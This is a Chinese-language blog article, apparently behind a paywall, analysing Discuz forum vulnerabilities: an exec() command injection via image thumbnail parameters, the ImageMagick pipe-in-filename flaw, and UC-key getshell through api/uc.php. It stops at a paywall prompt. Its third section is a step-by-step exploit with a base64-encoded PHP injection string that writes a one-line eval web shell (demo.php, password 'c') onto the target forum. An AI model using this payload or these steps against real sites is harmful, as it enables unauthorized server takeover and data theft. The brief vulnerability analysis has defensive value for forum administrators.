0x00 网站快照劫持:DZ常见漏洞利用分析
0x01 Discuz上传图片附件实现远程命令执行漏洞
漏洞产生过程:forum_image.php中的$w,$h变量可控,末处理直接传入Thumb()函数,经该函数传入Thumb_IM()函数,最终调用exec()导致远程命令执行漏洞。
通过分析可知:需要forum.php调用image_class模块调用图像预览功能,后台上传设置为ImagicMagick库,默认为GD库渲染。前台登录发贴上传图片附件。
提示: forum.php是常被利用的文件(论坛首页入口组件),论坛附件上传是个突破口。
0x02 ImageMagick远程执行漏洞分析及利用
目前所有版本的Graphicsmagick和ImageMagick都支持打开文件,当文件名的第一个字符为‘|’,则文件名会被传递给shell程序执行,导致(可能远程)代码执行。
提示:ImageMagick图片程序对文件名处理机制存在漏洞
0x03 Discuz GetShell(获取权限)漏洞EXP
1.注册任意账户,登陆用户,发表blog日志(注意是日志)
2.添加图片,选择网络图片,地址
{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
3.访问日志,论坛根目录下生成demo.php,一句话密码c
由0x01、0x02与0x03可知论坛上传图片是被利用最常见的漏洞,管理员们要注意把控。
0x04 Discuz获取UC key Getshell(获取权限) 。
知道UC的appkey的情况下getshell,问题的根源在于api/uc.php
几乎所有版本都可以(在得到uc_key情况下)/api/uc.php里面有个synlogin方法
只要网上随便找个以前uckeygetshell的脚本加密一下这个'tim
最低0.47元/天 解锁文章
103
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
